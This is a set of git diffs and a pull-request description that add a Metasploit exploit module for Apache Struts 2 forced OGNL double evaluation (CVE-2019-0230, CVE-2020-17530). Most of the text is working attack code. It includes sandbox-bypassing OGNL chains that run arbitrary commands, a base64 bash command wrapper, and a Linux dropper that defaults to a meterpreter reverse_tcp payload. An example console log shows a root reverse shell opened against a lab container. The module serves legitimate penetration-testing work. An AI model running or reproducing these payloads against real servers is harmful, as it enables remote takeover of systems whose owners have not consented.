@@ -93,29 +123,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_ognl(cve, cmd)
+    cmd = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
     ognl = []
     if cve == 'CVE-2019-0230'
-      ognl << '(#context=#attr[\'struts.valueStack\'].context)'
-      ognl << '(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))'
-      ognl << "(@java.lang.Runtime@getRuntime().exec('#{cmd}'))"
+      ognl << '#context=#attr[\'struts.valueStack\'].context'
+      ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'
+      ognl << "@java.lang.Runtime@getRuntime().exec(\"#{cmd}\")"
     elsif cve == 'CVE-2020-17530'
-      ognl << '(#instancemanager=#application["org.apache.tomcat.InstanceManager"])'
-      ognl << '(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"])'
-      ognl << '(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap"))'
-      ognl << '(#bean.setBean(#stack))'
-      ognl << '(#context=#bean.get("context"))'
-      ognl << '(#bean.setBean(#context))'
-      ognl << '(#macc=#bean.get("memberAccess"))'
-      ognl << '(#bean.setBean(#macc))'
-      ognl << '(#emptyset=#instancemanager.newInstance("java.util.HashSet"))'
-      ognl << '(#bean.put("excludedClasses",#emptyset))'
-      ognl << '(#bean.put("excludedPackageNames",#emptyset))'
-      ognl << '(#arglist=#instancemanager.newInstance("java.util.ArrayList"))'
-      ognl << "(#arglist.add(\"#{cmd}\"))"
-      ognl << '(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute"))'
-      ognl << '(#execute.exec(#arglist))'
+      ognl << '#instancemanager=#application["org.apache.tomcat.InstanceManager"]'
+      ognl << '#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]'
+      ognl << '#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")'
+      ognl << '#bean.setBean(#stack)'
+      ognl << '#context=#bean.get("context")'
+      ognl << '#bean.setBean(#context)'
+      ognl << '#macc=#bean.get("memberAccess")'
+      ognl << '#bean.setBean(#macc)'
+      ognl << '#emptyset=#instancemanager.newInstance("java.util.HashSet")'
+      ognl << '#bean.put("excludedClasses",#emptyset)'
+      ognl << '#bean.put("excludedPackageNames",#emptyset)'
+      ognl << '#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")'
+      ognl << "#execute.exec({\"#{cmd}\"})"
     end
 
-    "#{ognl.join('.')}"
+    ognl.map { |part| "(#{part})" }.join('.')
   end
 end

--- a/modules/exploits/multi/http/struts2_double_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_double_eval_ognl.rb
@@ -1,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts 2 Forced Double OGNL Evaluation',
+      'Description'    => %q{
+
+      },
+      'Author'         => [
+        # todo: add the remaining authors
+        'Spencer McIntyre' # Metasploit module
+      ],
+      'References'     => [
+        # todo: add the references
+      ],
+      'Privileged'     => false,
+      'Targets'        => [
+        [
+          'Unix Command',
+          {
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_cmd,
+          }
+        ]
+      ],
+      'DisclosureDate' => '2018-08-22', # todo: set the disclosure date
+      'DefaultTarget'  => 0))
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
+      OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),
+      OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', ['Automatic', 'CVE-2020-17530', 'CVE-2019-0230']])
+    ])
+     # todo: add an HttpCookie advanced option if necessary
+  end
+
+  def check
+    cves = []
+    res = nil
+    num1, num2 = rand(1000..9999), rand(1000..9999)
+
+    %w{ CVE-2019-0230 CVE-2020-17530 }.each do |cve|
+      next unless (datastore['CVE'] == 'Automatic' || datastore['CVE'] == cve)
+      res = send_request_cgi(build_http_request(cve, "#{num1}*#{num2}"))
+      if res && !res.body.scan((num1 * num2).to_s).empty?
+        print_good("The endpoint is vulnerable to #{cve}")
+        cves << cve
+      end
+    end
+
+    return CheckCode::Unknown if res.nil?
+    return CheckCode::Safe if cves.empty?
+    @cves = cves
+    CheckCode::Vulnerable(details: {cves: cves})
+  end
+
+  def exploit
+    cve = @cves.first
+    vprint_status("Exploiting #{cve}...")
+
+    execute_command(payload.encoded, opts={cve: cve})
+  end
+
+  def execute_command(cmd, opts={})
+    res = send_request_cgi(
+      build_http_request(opts[:cve], build_ognl(opts[:cve], cmd))
+    )
+    fail_with(Failure::UnexpectedReply, 'Command execution failed') unless res
+  end
+
+  def build_http_request(cve, ognl)
+    http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }
+    if cve == 'CVE-2019-0230'
+      http_request_parameters['method'] = 'GET'
+      http_request_parameters['vars_get'] = {datastore['NAME'] => "%{#{ognl}}"}
+    elsif cve == 'CVE-2020-17530'
+      http_request_parameters['method'] = 'POST'
+      http_request_parameters['vars_post'] = {datastore['NAME'] => "%{#{ognl}}"}
+    end
+    http_request_parameters
+  end
+
+  def build_ognl(cve, cmd)
+    ognl = []
+    if cve == 'CVE-2019-0230'
+      ognl << '(#context=#attr[\'struts.valueStack\'].context)'
+      ognl << '(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))'
+      ognl << "(@java.lang.Runtime@getRuntime().exec('#{cmd}'))"
+    elsif cve == 'CVE-2020-17530'
+      ognl << '(#instancemanager=#application["org.apache.tomcat.InstanceManager"])'
+      ognl << '(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"])'
+      ognl << '(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap"))'
+      ognl << '(#bean.setBean(#stack))'
+      ognl << '(#context=#bean.get("context"))'
+      ognl << '(#bean.setBean(#context))'
+      ognl << '(#macc=#bean.get("memberAccess"))'
+      ognl << '(#bean.setBean(#macc))'
+      ognl << '(#emptyset=#instancemanager.newInstance("java.util.HashSet"))'
+      ognl << '(#bean.put("excludedClasses",#emptyset))'
+      ognl << '(#bean.put("excludedPackageNames",#emptyset))'
+      ognl << '(#arglist=#instancemanager.newInstance("java.util.ArrayList"))'
+      ognl << "(#arglist.add(\"#{cmd}\"))"
+      ognl << '(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute"))'
+      ognl << '(#execute.exec(#arglist))'
+    end
+
+    "#{ognl.join('.')}"
+  end
+end

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',
         'Description' => %q{
-          The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain
-          tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's
-          attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
+          The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags
+          attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a
+          tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
 
           This vulnerability is application dependant. A server side template must make an affected use of request data to
           render an HTML tag attribute.

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -66,42 +66,47 @@ class MetasploitModule < Msf::Exploit::Remote
       Opt::RPORT(8080),
       OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
       OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),
-      OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', ['Automatic', 'CVE-2020-17530', 'CVE-2019-0230']])
+      OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])
     ])
     register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
       OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])
     ])
   end
 
   def check
-    cves = []
-    res = nil
     num1, num2 = rand(1000..9999), rand(1000..9999)
 
-    %w{ CVE-2019-0230 CVE-2020-17530 }.each do |cve|
-      next unless (datastore['CVE'] == 'Automatic' || datastore['CVE'] == cve)
-      res = send_request_cgi(build_http_request(cve, "#{num1}*#{num2}"))
-      if res && !res.body.scan((num1 * num2).to_s).empty?
-        print_good("The endpoint is vulnerable to #{cve}")
-        cves << cve
-      end
+    res = send_request_cgi(build_http_request(datastore['CVE'], "#{num1}*#{num2}"))
+    if res.nil?
+      return CheckCode::Unknown
+    elsif res.body.scan((num1 * num2).to_s).empty?
+      return CheckCode::Safe
     end
 
-    return CheckCode::Unknown if res.nil?
-    return CheckCode::Safe if cves.empty?
-    @cves = cves
-    CheckCode::Vulnerable(details: {cves: cves})
+    return CheckCode::Appears
   end
 
   def exploit
-    cve = @cves.first
+    cve = datastore['CVE']
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}")
+
+    if cve == 'CVE-2019-0230'
+      ognl = []
+      ognl << '#context=#attr[\'struts.valueStack\'].context'
+      ognl << '#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']'
+      ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'
+      ognl << '#ognlUtil.setExcludedClasses(\'\')'
+      ognl << '#ognlUtil.setExcludedPackageNames(\'\')'
+      res = send_request_cgi(build_http_request(cve, ognl))
+      fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200
+    end
 
     case target['Type']
     when :unix_cmd
       execute_command(payload.encoded, {cve: cve})
     when :linux_dropper
-      execute_cmdstager({cve: cve, linemax: 1024})  # todo: validate this linemax value
+      execute_cmdstager({cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 400})
     end
   end
 
@@ -110,6 +115,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_http_request(cve, ognl)
+    ognl = ognl.map { |part| "(#{part})" }.join('.') if ognl.is_a? Array
+
     http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }
     http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?
     if cve == 'CVE-2019-0230'
@@ -145,6 +152,6 @@ class MetasploitModule < Msf::Exploit::Remote
       ognl << "#execute.exec({\"#{cmd}\"})"
     end
 
-    ognl.map { |part| "(#{part})" }.join('.')
+    ognl
   end
 end

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -11,62 +11,66 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Struts 2 Forced Multi OGNL Evaluation',
-      'Description'    => %q{
-        The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain
-        tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's
-        attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',
+        'Description' => %q{
+          The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain
+          tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's
+          attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
 
-        This vulnerability is application dependant. A server side template must make an affected use of request data to
-        render an HTML tag attribute.
-      },
-      'Author'         => [
-        'Spencer McIntyre', # Metasploit module
-        'Matthias Kaiser', # discovery of CVE-2019-0230
-        'Alvaro Muñoz', # (@pwntester) discovery of CVE-2020-17530
-        'ka1n4t', # PoC of CVE-2020-17530
-      ],
-      'References'     => [
-        ['CVE', '2019-0230'],
-        ['CVE', '2020-17530'],
-        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],
-        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],
-        ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],
-        ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],
-        ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],
-        ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],
-      ],
-      'Privileged'     => false,
-      'Targets'        => [
-        [
-          'Unix Command',
-          {
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_cmd,
-          }
-        ],
-        [
-          'Linux Dropper',
-          {
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Type' => :linux_dropper,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-            }
-          }
-        ]
-      ],
-      'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date
-      'Notes'          =>
-        {
-          'Stability'   => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
+          This vulnerability is application dependant. A server side template must make an affected use of request data to
+          render an HTML tag attribute.
         },
-      'DefaultTarget'  => 0))
+        'Author' => [
+          'Spencer McIntyre', # Metasploit module
+          'Matthias Kaiser', # discovery of CVE-2019-0230
+          'Alvaro Muñoz', # (@pwntester) discovery of CVE-2020-17530
+          'ka1n4t', # PoC of CVE-2020-17530
+        ],
+        'References' => [
+          ['CVE', '2019-0230'],
+          ['CVE', '2020-17530'],
+          ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],
+          ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],
+          ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],
+        ],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+            'Reliability' => [ REPEATABLE_SESSION, ]
+          },
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options([
       Opt::RPORT(8080),
@@ -81,12 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    num1, num2 = rand(1000..9999), rand(1000..9999)
+    num1 = rand(1000..9999)
+    num2 = rand(1000..9999)
 
     res = send_request_cgi(build_http_request(datastore['CVE'], "#{num1}*#{num2}"))
     if res.nil?
       return CheckCode::Unknown
-    elsif res.body.scan(/(["'])\s*#{(num1 * num2).to_s}\s*\1/).empty?
+    elsif res.body.scan(/(["'])\s*#{(num1 * num2)}\s*\1/).empty?
       return CheckCode::Safe
     end
 
@@ -110,13 +115,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Type']
     when :unix_cmd
-      execute_command(payload.encoded, {cve: cve})
+      execute_command(payload.encoded, { cve: cve })
     when :linux_dropper
-      execute_cmdstager({cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512})
+      execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })
     end
   end
 
-  def execute_command(cmd, opts={})
+  def execute_command(cmd, opts = {})
     send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)
   end
 
@@ -127,10 +132,10 @@ class MetasploitModule < Msf::Exploit::Remote
     http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?
     if cve == 'CVE-2019-0230'
       http_request_parameters['method'] = 'GET'
-      http_request_parameters['vars_get'] = {datastore['NAME'] => "%{#{ognl}}"}
+      http_request_parameters['vars_get'] = { datastore['NAME'] => "%{#{ognl}}" }
     elsif cve == 'CVE-2020-17530'
       http_request_parameters['method'] = 'POST'
-      http_request_parameters['vars_post'] = {datastore['NAME'] => "%{#{ognl}}"}
+      http_request_parameters['vars_post'] = { datastore['NAME'] => "%{#{ognl}}" }
     end
     http_request_parameters
   end

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -60,6 +60,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        },
       'DefaultTarget'  => 0))
 
     register_options([

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apache Struts 2 Forced Double OGNL Evaluation',
+      'Name'           => 'Apache Struts 2 Forced Multi OGNL Evaluation',
       'Description'    => %q{
         The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain
         tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(build_http_request(datastore['CVE'], "#{num1}*#{num2}"))
     if res.nil?
       return CheckCode::Unknown
-    elsif res.body.scan((num1 * num2).to_s).empty?
+    elsif res.body.scan(/(["'])\s*#{(num1 * num2).to_s}\s*\1/).empty?
       return CheckCode::Safe
     end
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_cmd
       execute_command(payload.encoded, {cve: cve})
     when :linux_dropper
-      execute_cmdstager({cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 400})
+      execute_cmdstager({cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512})
     end
   end
 


### PR DESCRIPTION
This adds an exploit for CVE-2019-0230 and CVE-2020-17530 which are both issues resulting in Struts2 evaluating OGNL expressions multiple times. These vulnerabilities are inherently application dependant. Users will want to set the `NAME` parameter appropriately and use the check method to ensure that the evaluation takes place within an HTML attribute.

I think it makes sense to keep these vulnerabilities together. They use different OGNL chains and HTTP verbs but are otherwise pretty similar in the sense that they both are the result of multiple evaluations of OGNL expressions in HTML attributes. The CVE-2019-0230 OGNL chain for RCE requires a one time chain to enable the RCE gadget, this is handled automatically in the exploit.

The check method is a bit finicky. The OGNL gadget chain for CVE-2020-17530 will echo the command output, while the other doesn't so they both use a simple mathematical expression to ensure the evaluation takes place. This came from the public PoCs and seems to be a pretty common technique. The limitation I found with this was that the simple evaluation would yield false positives when trying to identify which of the CVEs the system is vulnerable to which is why there is no "Automatic" target. The user will need to know which CVE they're targeting for, with the default being the more recent of the pair.

I also updated the docs for the `exploit/multi/http/struts2_namespace_ognl` to improve how they are rendered in markdown. You'll notice that the changes are related to the markdown formatting not the content. The XML tags must be escaped in the markdown to not break the rendered output from msfconsole's `info -d` command.

## Verification Steps

- [x] Install and configure the images provided by vulhub (**one at a time** since they both use port 8080), these steps are documented in the module docs.
    - [x] `cd struts2/s2-059`
    - [x] `docker-compose up -d`
- [x] Test the module against the targets
    - [x] Spin up `msfconsole` and `use exploit/multi/http/struts2_multi_eval_ognl`
    - [x] Leave the `NAME` parameter at its default value of `id`
    - [x] Set the `CVE` datastore option based on the one you're testing
    - [x] Run `check` and make sure it's identified as "Appears" vulnerable
    - [x] Run a payload and obtain a session

## Example

``` 
msf6 > use exploit/multi/http/struts2_multi_eval_ognl 
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230 
CVE => CVE-2019-0230
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper 
TARGET => Linux Dropper
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
[*] Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3008420 bytes) to 172.19.0.2
[*] Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.2:47884) at 2020-12-15 19:47:10 -0500
meterpreter > getuid
Server username: root @ 91f7855f1eda (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.19.0.2
OS           : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```